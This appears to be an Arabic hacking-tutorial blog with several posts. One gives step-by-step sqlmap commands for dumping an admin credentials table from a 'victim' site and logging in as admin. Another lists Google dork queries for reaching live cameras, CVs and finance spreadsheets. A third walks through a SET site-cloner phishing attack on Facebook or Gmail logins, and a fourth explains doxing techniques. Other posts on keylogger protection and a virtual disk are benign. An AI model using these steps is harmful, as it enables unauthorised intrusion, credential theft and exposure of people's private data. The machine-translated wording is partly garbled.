تابعنا عبرFacebook

التبادل الإعلاني

الأحد، 30 يونيو 2013

إختراق المواقع بإستخدام الباك تراك 5 (sqlmap)

السلام عليكم ورحمة الله وبركاته

اليوم سنقوم بشرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التلقائي الذي يساعدك على الإختراق الموقع بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !


2. الآن العثور على موقع مصاب. (وأيضا لدي موقع مصاب)


3. الآن اكتب هذا الأمر  واضغط على enter. 


python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !




حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.

5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.


python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
 

 

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ



8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns 




الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!



الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

الخميس، 27 يونيو 2013

شرح طريقة إضافة قرص إفتراضي مساحته 10 جيجا

السلام عليكم في شرح جديد من دروس نقط التعلم

الشرح عبارة عن طريقة لإضافة قرص إفتراضي مساحته 10 جيجا !

أول شيء نقوم بتحميل البرنامج :

 http://Dulink.us/download.php?id=34186


نظغط عليه ليفتح , ثم نقوم بتثبيته !



بعد التثبيت ندخل Poste de travail سنجد هذا القرص فنضغط عليه



سيطلب منك الإسم وكلمة السر ! أدخل حسابك gmail



وبهذا ستكون قد حصلة على قرص إفتراضي بمساحة 10 يمكنك أن تعمل فيه كلما تريده !

حصريا: كيفية استخدام جوجل للإختراق (لاستغلال الثغرات الأمنية)

يقدم جوجل ما يقرب من 80 في المئة من جميع طلبات البحث على شبكة الإنترنت، مما يثبت نفسه كمحرك البحث الأكثر شعبية. ومع ذلك، وجوجل يجعل من الممكن للوصول ليس فقط موارد المعلومات المتاحة للجمهور، ولكن أيضا يعطي الوصول إلى بعض المعلومات الأكثر سرية التي لا ينبغي أبدا قد كشفت.

في هذا الشرح، سوف تجد المعلومات حول كيفية استخدام جوجل لاستغلال الثغرات الأمنية الموجودة في العديد من المواقع. وفيما يلي بعض الطرق لاستخدام جوجل للإختراق:

1. استخدام جوجل لإختراق كاميرات الأمن:

يوجد العديد من الكاميرات الأمنية التي يتم استخدامها لرصد أماكن مثل مواقف السيارات، الخ . حركة المرور على الطرق مع Google، فمن الممكن أن الإختراق هذه الكاميرات بحيث يمكنك عرض الصور التي تم التقاطها من قبلهم في الوقت الحقيقي. لهذا، كل ما عليك القيام به هو مجرد استخدام الاستعلام البحث التالية في غوغل. اكتب في مربع بحث Google كما أدناه و أدخل:

inurl:”viewerframe?mode=motion”

انقر على أي من نتائج البحث و سوف تصل إلى الكاميرا الحية التي لديها ضوابط الكامل. سوف ترى شيئا كما يلي:

كما تشاهدون في الصورة أعلاه، الآن أصبح لديك الوصول إلى الكاميرات الحية التي تعمل في الوقت الحقيقي. ويمكنك أيضا نقل الكاميرات في جميع الاتجاهات الأربعة، تنفيذ إجراأت مثل التكبير والتصغير. هذه الكاميرا لديه حقا أقل معدل التحديث. ولكن هناك استعلامات البحث الأخرى التي من خلالها يمكنك الوصول إلى غيرها من آلات التصوير التي لديها أسرع معدلات التحديث. من أجل الوصول إليها، ومجرد استخدام الاستعلام البحث التالية:


intitle:”Live View / – AXIS”


الآن، انقر على أي من نتائج البحث للوصول إلى مجموعة مختلفة من الكاميرات الحية. وهكذا قد ثم اختراق كاميرات الأمن باستخدام جوجل.


 2. استخدام جوجل لإختراق الوثائق الشخصية والسرية:

 باستخدام جوجل يمكنك الوصول إلى قاعدة معطيات البريد الإلكتروني التي تحتوي على السيرة الذاتية لمئات من الناس التي تم إنشاؤها عند التقدم بطلب للحصول وظائفهم. الوثائق التي تتضمن عناوينهم، الهاتف، تاريخ الميلاد، التعليم، خبرة العمل الخ ويمكن الاطلاع فقط في ثوان.


intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”


يمكنك الوصول إلى قائمة من ملفات XLS (وثائق سرية) والتي تحتوي على تفاصيل الاتصال بما في ذلك عناوين البريد الإلكتروني من مجموعة كبيرة من الناس للقيام بذلك، اكتب استعلام البحث التالية وأدخل:

filetype:xls inurl:”email.xls”

أيضا، فمن الممكن للوصول إلى وثائق يحتمل أن تكون تحتوي على معلومات عن حسابات مصرفية وملخصات المالية وأرقام بطاقات الائتمان باستخدام استعلام البحث التالية:

intitle:index.of finances.xls

3. استعمال جوجل للوصول إلى المواد المجانية:

“?intitle:index.of?mp3 eminem


الآن، عليك الوصول إلى الوثيقة كاملة من ألبوم eminem حيث في يمكنك تحميل الأغاني من اختيارك. بدلا من eminem يمكنك استبدال اسم الألبوم المفضلة لديك. للبحث عن الكتب كل ما عليك القيام به هو استبدال "eminem " مع اسم كتابك المفضل. أيضا استبدال "MP3" مع "PDF" أو "zip" أو "RAR".


وآمل أن تستمتعو باستخدام جوجل للإختراق على شبكة الإنترنت. إذا أعجبكم هذا الدرس ، إرجو التقييم بتعليقاتكم !

الأربعاء، 26 يونيو 2013

درس شامل عن Keyloggers: ماهو Keyloggers, كيف يعمل، وكيفية الحماية من ماهو Keyloggers

حماية الكمبيوتر من Keyloggers كانت مشكلة كبيرة, اليوم لأنها لا تتطلب أي معرفة مسبقة من أجهزة الكمبيوتر لاستخدامها. لذلك، غالبا ما يتم استخدامها من قبل المتسللين لسرقة كلمات السر وأرقام بطاقات الائتمان وغيرها من البيانات السرية من جهاز الكمبيوتر الخاص بك. وفيما يلي بعض الطرق التي يمكنك من خلال حماية الكمبيوتر من  Keyloggers


1. استخدام البرامج المناسب لمكافحة الفيروسات:


 هذه هي الخطوة الأولى والأساسية التي تحتاج إلى اتخاذها من أجل حماية جهاز الكمبيوتر الخاص بك من كيلوغرز وغيرها من التهديدات على الانترنت. استخدام البرامج المناسبة لمكافحة الفيروسات مثل Kaspersky, Norton أو McAfee  وتحديثها بانتظام.

2. استخدام البرامج مكافحة للتجسس


إذا كنت مستخدم الإنترنت بشكل متكرر، يمكن أن تتعرض لعدد من برامج التجسس على أساس منتظم. وكلوغر هو في من Keyloggers أهم برامج التجسس، فمن الأفضل تثبيت برنامج مكافحة التجسس جيدة. تأكد من أنك تستخدم برامج مكافحة الفيروسات وبرامج مكافحة التجسس لا تتعارض مع بعضها البعض.

3. هل برامج Antilogger  ضرورية للحماية من Keyloggers

Antiloggers هي البرامج التي تكشف عن وجود Keyloggers على جهاز كمبيوتر معين. على مدى السنوات القليلة الماضية، لقد اختبرت الكثير من برامج  anti-logging  ولقد وجدت Zemana Antilogger كأفضل حل.

عادتا، يمكن بسهولة الكشف عن Keyloggers باستخدام برنامج مكافحة الفيروسات جيدة، ولكن القراصنة قد تستخدم بعض الأساليب مثل هيكسينج، ملزمة أو crypting لتجعل من الصعب على برنامج مكافحة الفيروسات للكشف عن ذلك. في هذه الحالة، Zemana Antilogger يأتي في متناول يدي كما تم تصميم هذا البرنامج خصيصا لحماية جهاز الكمبيوتر الخاص بك ضد كيلوغرز الضارة.

4. المسح الضوئي عبر الإنترنت (Scanning)


أي وقت مضى عندما تتلقى ملف مشبوه، يمكنك مسحها ضوئيا مع الماسحات الضوئية على الانترنت مثل محرك متعدد مكافحة الفيروسات الماسح الضوئي الذي يمسح الملف الخاص بك مع 24 محركات الحماية من الفيروسات شعبية وتقارير إعادته إلى ما إذا تم التعرف على الملف ك فيروس أو برامج التجسس. وهذا يضمن أن أيا من البرامج الخبيثة يمكن الهروب من ان يتم رصدها كما أن هناك 24 محركات الحماية من الفيروسات المختلفة المشاركة في عملية المسح.

5. استخدام Sandboxie

Sandboxie هو برنامج كبير آخر لمساعدتك على حماية الكمبيوتر الخاص بك ضد keyloggers الضارة وبرامج التجسس. Sandboxie تشغل الكمبيوتر في مساحة منعزلة والذي يمنع البرنامج من إجراء تغييرات دائمة في البرامج الأخرى في جهاز الكمبيوتر الخاص بك.




لتشغيل برنامج في Sandboxie، اتبع الخطوات المذكورة على النحو التالي:

1- افتح أداة Sandboxie  وانقر على القائمة رمل على القمة sandbox menu on the top.

2- الآن انتقل إلى Default sandbox.


3- ثم انقر على run any program.


4- الآن حدد الملف الذي ترغب في تشغيله في sandboxie ثم انقر على open.

6. Keyscrambler

 Keyscrambler هي واحدة من أفضل البرنامج الذي يوفر الحماية ضد keyloggers. وهو عبارة عن برنامج صغير يقوم بتشفير ضربات المفاتيح الخاصة بك بحيث، حتى إذا كان جهاز الكمبيوتر الخاص بك يحتوي على keylogger مثبتة عليه، يتم التقاط فقط ضغطات المفاتيح المشفرة بواسطة keylogger وليس منها الفعلية.

شرح إضافة 3 كلمات سر لدخول الفيس بوك !

السلام عليكم
في هذا الشرح سوف نتعلم طريقة إضافة 3 كلمات سر لدخول الفيس بوك على عكس الآخرين !!!


بالنسبة لهذا الشرح فهو لأول مرة وحصريا على نقطة التعلم !

الدرس مقدم من الأخ noureddine elayane

 الفيسبوك يتيح لك تسجيل الدخول باستخدام 3 أنواع مختلفة من كلمة المرور الخاصة بك. فقط عدد قليل من مستخدمي الفيسبوك يدركون هذه الحقيقة، ولكن بالنسبة لكثيرين آخرين، وهذا قد يبدو من المستغرب قليلا. الفيسبوك يقبل الأشكال التالية من كلمة المرور:

1. كلمة السر الخاصة بك (الأصلية)
اسمحوا لي أن أشرح لكم هذا مع المثال التالي. نفترض أن لديك الفيسبوك كلمة المرور الافتراضية التي قمت بإنشائها أثناء عملية الاشتراك هو:

2. كلمة المرور مع حالة تم تشغيل



في كلمة المرور فوق الحروف 'F' و 'P' في الكبيرة والنسبة المتبقية هي في صغيرة. إذا كنت تبديل حالة حيث يتم تحويل كافة الأحرف الكبيرة في الصغيرة والعكس بالعكس، فإن الافتراضي الخاص بك كلمة السر "myFacebookPass" تصبح:




الآن إذا قمت بتسجيل الدخول باستخدام كلمة المرور في أعلاه مثبت، الفيسبوك الخاص بك نقبل به ويرحب بكم! هذا هو الاختلاف الأول من كلمة المرور الافتراضية الخاصة بك والتي تم قبولها بواسطة الفيسبوك.

3. كلمة السر مع الرسالة الأولى الأحرف الصغيرة


إذا كان الحرف الأول من كلمة السر هو في الصغيرة، قد كنت مجرد تغيير تلك الرسالة الأولى إلى أحرف كبيرة والفيسبوك لن يقبل مرة أخرى وتتيح لك فيها كما هو الحال في المثال أعلاه حيث كلمة المرور الافتراضية هي "myFacebookPass"، و مجرد تغيير الحرف الأول إلى أحرف كبيرة، سوف تكون كلمة المرور الخاصة بك "MyFacebookPass" وهذا يجب أن تعمل بشكل جيد أيضا:


لماذا 3 كلمات المرور؟


الآن، تعلمون جميعا أن الفيسبوك يمكن الوصول إليها باستخدام 3 كلمات مرور مختلفة. ولكن قد يكون من الغريب أن نعرف السبب الحقيقي وراء ذلك.

حسنا، هذا هو بالتأكيد ليس بسبب الفيسبوك لديه خلل أو ثغرة خطيرة. في الواقع، وهذا هو مجرد خيار المقدمة من الفيسبوك نفسه لجعل تسجيل الدخول في العملية أسهل للمستخدمين. وإليك الطريقة:

السبب الأكثر شيوعا للتسجيلات أصلية أن يكون رفض هو عندما LOCK CAPS هو ON. هذا هو المكان الذي يأتي الاختلاف الأول في متناول اليدين. وهذا يعني، عندما LOCK CAPS هو على الحالة يحصل عكس (مثبت) عن كلمة السر الخاصة بك ولكن سوف الفيسبوك قبول هذا كذلك.

في حالة مستخدمي الهواتف المتحركة، بل هو مشترك لأول حرف من كلمة المرور للحصول على تكبير الذي غالبا ما يؤدي إلى فشل تسجيل الدخول. لذلك، من أجل معالجة هذه القضية، الفيسبوك سيتم أيضا قبول كلمة المرور حيث يتم تكبير الحرف الأول فقط.

وبالتالي إذا تم تمكين CAPS LOCK بطريق الخطأ، فإن ميزة كلمة المرور مثبت تزال تتيح لك تسجيل الدخول إلى حسابك!

كيفية إختراق الفيس بوك باستخدام بالباك تراك 5 (backtrak 5)



السلام عليكم زوار ومتابعي نقطة التعلم اليوم سوف أشرح لكم "كيفية إختراق الفيس بوك باستخدام بالباك تراك 5 (backtrak 5) " لذلك ما عليك سوى اتباع خطوات بسيطة.



الآن فتح أدوات الهندسة الاجتماعية (SET).

فقط اضغط على Enter و SET ستفتح، الآن ما عليك سوى اختيار الخيار 1 (1 Social-Engineering Attacks) واضغط بعد ذلك عدد 2 (فقط من النوع 2 كما هو موضح)



الآن إختر 4“Tabnabbing Attack Method” ثم ENTER



ثم حدد الخيار 2 “Site Cloner” وإضغط ENTER



الآن هنا تحتاج إلى إضافة عنوان URL من الفيسبوك (إذا كنت تريد أن تختراق جوجل أدخل فقط عنوان URL الخاص ب Gmail)


الآن بمجرد الضغط على enter ثم الهجوم !



إفتح ifconfig ثم ENTER



الآن مجرد انسخ عنوان IP وافتحه في المتصفح.



الآن أكتب البريد الإلكتروني وكلمة المرور لمعرفة ما إذا كان يعمل أو لا.



الآن نلاحظ التبليغ على الباك تراك (البريد الإلكتروني وكلمة المرور)!



هذا البرنامج التعليمي هو غرض تعليمي في نقطة التعلم فقط وأنا لست مسؤول عن كل من يستعمله إستعمالا خطيرا !
وبالنسبة لأصحاب السرعة الفائقة (نسخ/لصق) فجميع الحقوق محفوظة لنقطة التعلم
.

الثلاثاء، 25 يونيو 2013

ما هو Doxing وكيف يتم ذلك؟

ما Doxing وكيف يتم ذلك؟ في العالم الحديث، وأصبح الإنترنت مكانا رائعا لاكتساب المعرفة، وتبادل الأفكار، وتبادل المعلومات، وتكوين صداقات جديدة وغيرها. على الرغم من ذلك، يمكنك أن تفعل كل هذا من خلال ما تبقى مجهولة وراء الشاشة، ويمكن هويتك الحياة الحقيقية أو أي تفاصيل شخصية لا يزال في خطر الوقوع في أيدي الغرباء. هذا هو المكان الذي يأتي مصطلح "doxing" في اللعب!

ما Doxing؟


Doxing يشير ببساطة إلى عملية جمع أو استنتاج معلومات الأشخاص الآخرين مثل الاسم والعمر، والبريد الإلكتروني، العنوان، رقم الهاتف، والصور، وما إلى ذلك باستخدام المصادر المتاحة للجمهور مثل الإنترنت. وبعبارة أخرى، doxing هو فعل من استخدام الإنترنت للبحث عن معلومات شخصية عن الشخص.

ويتم ذلك عن طريق أخذ Doxing في البداية قطعة من المعلومات (مثل "اسم" أو "عنوان البريد الإلكتروني") والحفاظ عليه كقاعدة لمعرفة غيرها من التفاصيل ممكن حول الشخص. يشتق مصطلح "doxing" من "وثيقة تتبع" الكلمة التي تعني لاسترجاع الوثائق عن شخص أو شركة معينة من أجل معرفة المزيد عنها.

تقنيات Doxing:


اليوم، وقد نمت الإنترنت إلى مثل هذا الحجم الذي كان يحتوي على أي تقريبا المعلومات التي كنت قد يتصور أي وقت مضى! كل ما قمت به هو استخدام التقنيات اليمين للبحث عن ما تريد. وهنا لائحة من doxing التقنيات التي تستخدم عادة من قبل معظم المهوسون الإنترنت والمتسللين الأخلاقي
ين:

استخدم Google:


جوجل هو بلا شك أداة قوية أن يلعب دورا رئيسيا في doxing. منذ فهارس جوجل أي شيء تقريبا على شبكة الإنترنت (حتى في بعض الأحيان معلومات خاصة)، فمن الممكن أن دوكس للحصول على تفاصيل مثل هوية البريد الإلكتروني، العنوان، أرقام الهاتف والصور من أي شخص أو شركة. بمجرد الحصول على نتائج البحث عن الاستعلام الخاص بك، تدرس بعناية وصف الجزء الذي في معظم الحالات تحتوي على قطعة من المعلومات التي كنت تبحث عنها.

مواقع الشبكات الاجتماعية:


كما تم العثور على معظم مستخدمي الإنترنت لتكون نشطة على وسائل الإعلام الاجتماعية، ومواقع الشبكات الاجتماعية مثل الفيسبوك وينكدين توفير منجم ذهب الظاهرية من المعلومات اللازمة لأداء doxing. حيث أن معظم المستخدمين لا يدركون القضايا الأمنية عبر الإنترنت، لديهم إعدادات الخصوصية الضعيفة على صورتهم. هذا يجعل من السهل للمهاجمين للوصول إلى المعلومات الشخصية مثل الصور والأسماء الحقيقية، والموقع، وفرص العمل، واسم الشريك الخ

بحث عكس أرقام الهاتف الخليوي:

A "بحث عكس أرقام الهاتف الخليوي" هو مجرد عملية إيجاد التفاصيل لشخص ما, مثل الاسم والعمر والعنوان والمعلومات المتعلقة باستخدام أرقام هواتفهم المحمولة والعكس بالعكس. هناك العديد من الخدمات عبر الإنترنت هناك مثل التسجيل الهاتف الخليوي التي توفر الوصول إلى تفاصيل شخصية عن شخص معين استنادا إلى تعريفه / هاتفه، واسمه ورقمه.

بحث WHOIS:

إذا كان الشخص أو الشركة لديها موقع على شبكة الانترنت (أو اسم المجال) المرتبطة بها، يمكنك بسهولة إجراء "بحث WHOIS" لموقعه على الانترنت للحصول على التفاصيل الشخصية مثل الاسم الكامل والعنوان والبريد الإلكتروني ورقم الهاتف. مجرد زيارة whois.domaintools.com وأدخل اسم المجال الذي تريد إجراء بحث WHOIS. سوف تظهر جميع التفاصيل المرتبطة اسم المجال.

لماذا بعض الأشخاص يستعملون Doxing؟

معظم الناس على أداء doxing بدافع الفضول العامة حول شخص أو شركة. ومع ذلك، هناك بعض العقول الشريرة هناك الذين يفعلون ذلك لغرض ابتزاز أو الانتقام من خلال تعريض المعلومات التي تجمعت عن الشخص.

ما هي النتائج المترتبة على Doxing؟


يمكن أن تكون مزعجة ومحرجة قليلا عندما تنخفض البيانات الخاصة في أيدي الناس الذين لا يقصد به أن يكون الوصول إلى هذه المعلومات. ومع ذلك، يمكن أن تسير الأمور أكثر سوءا إذا لم يتم إحراز معلومات doxed مثل أنشطة الشخص الاجتماعية، والتاريخ الطبي، التفضيل الجنسي وغيرها من بت حيويا للمعلومات العامة. هذا يمكن أن يكون تهديدا خطيرا للصحة، وسبل العيش أو علاقة الضحية.

خطوات لحماية نفسك من Doxing:

وفيما يلي بعض من الأكثر شيوعا استهدفت قطعة من المعلومات التي يمكن الحصول عليها بسهولة من خلال doxing:

-الاسم الكامل

-العمر والجنس وتاريخ الميلاد

-موقع ومكان الميلاد

-عناوين البريد الإلكتروني واسم المستخدم

-رقم الهاتف

-ملامح الشبكات الاجتماعية، والمواقع وبلوجر

لذلك، هو دائما ممارسة جيدة للحفاظ على البتات أعلاه من معلومات سرية. على الرغم من أنه ليس من الممكن القيام بذلك في جميع الحالات، لا يزال بإمكانك أن تحرص على حماية أكبر قدر من المعلومات يمكنك من التوجه إلى الرأي العام. يمكنك النظر في النصائح الإضافية التالية لمزيد من الحماية:

1- لا تقم بتحميل الصور الشخصية في ألبومات الويب مثل "Picasa". حتى لو قمت بذلك، تأكد من أن ألبومك مخفيا من محركات البحث العامة .

2- إذا كنت لا تنوي أن تظهر ملفك الشخصي على محركات البحث، بل هو الحكمة لجعل كل لمحات الإنترنت الخاص.

3- تحقيق أقصى قدر من إعدادات الخصوصية الخاصة بك ملامح الشبكة الاجتماعية. تأكد من أن ألبومات الفردية الخاصة بك والصور الفوتوغرافية لديها إعدادات الخصوصية الخاصة بهم.

4- لا تستخدم نفس عنوان البريد الإلكتروني للجميع الحسابات. بدلا من ذلك، إنشاء معرفات بريد إلكتروني منفصلة للأنشطة الفردية مثل الألعاب، والمشاركة المنتدى، وحسابات مصرفية الخ

هل Doxing جريمة؟

Doxing هي بالتأكيد ليست جريمة عند استخدامها ضمن المعايير الأخلاقية, ومع ذلك، إذا تم تسبب ضرر متعمد مثل التحرش، ابتزاز أو الانتقام قد يكون جيدا يعتبر جريمة.